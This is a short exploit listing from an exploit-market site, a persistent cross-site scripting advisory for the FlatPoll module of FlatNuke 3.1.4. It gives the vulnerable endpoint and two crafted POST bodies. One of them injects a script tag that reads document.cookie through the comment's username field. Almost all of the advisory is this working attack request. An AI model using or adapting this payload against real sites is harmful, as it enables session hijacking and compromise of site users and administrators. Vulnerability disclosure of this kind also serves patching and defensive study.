[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FlatNuke 3.1.4 (FlatPoll) Persistent XSS Vulnerability

Author
StAkeR
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-22879
Category
web applications
Date add
16-11-2014
Platform
php
-------------------------------------------------------------------------
[+] FlatNuke <= 3.1.4 (FlatPoll) Persistent XSS Vulnerability 
-------------------------------------------------------------------------
[*] Discovered by Juri Gianni - Turin,Italy
[*] staker - staker[at]hotmail[dot]it / shrod9[at]gmail[dot]com
[*] Discovered on 13/11/2014
[*] Site Vendor: http://www.flatnuke.org
[*] Category: WebApp
[*] BUG: PERSISTENT XSS
-----------------------------------------------------------------------------------------------
[+] http://localhost/flatnuke/index.php?mod=none_Sondaggio
[+] Modify the POST content
------------------------------------------------------------------------------------------------
[-] writecomm=writecomm&by=[ANY USERNAME][XSS]&body=This is my comment
[-] writecomm=writecomm&by=ADMIN<script>alert(document.cookie)</script>&body=This is my comment
------------------------------------------------------------------------------------------------

#  0day.today [2024-11-15]  #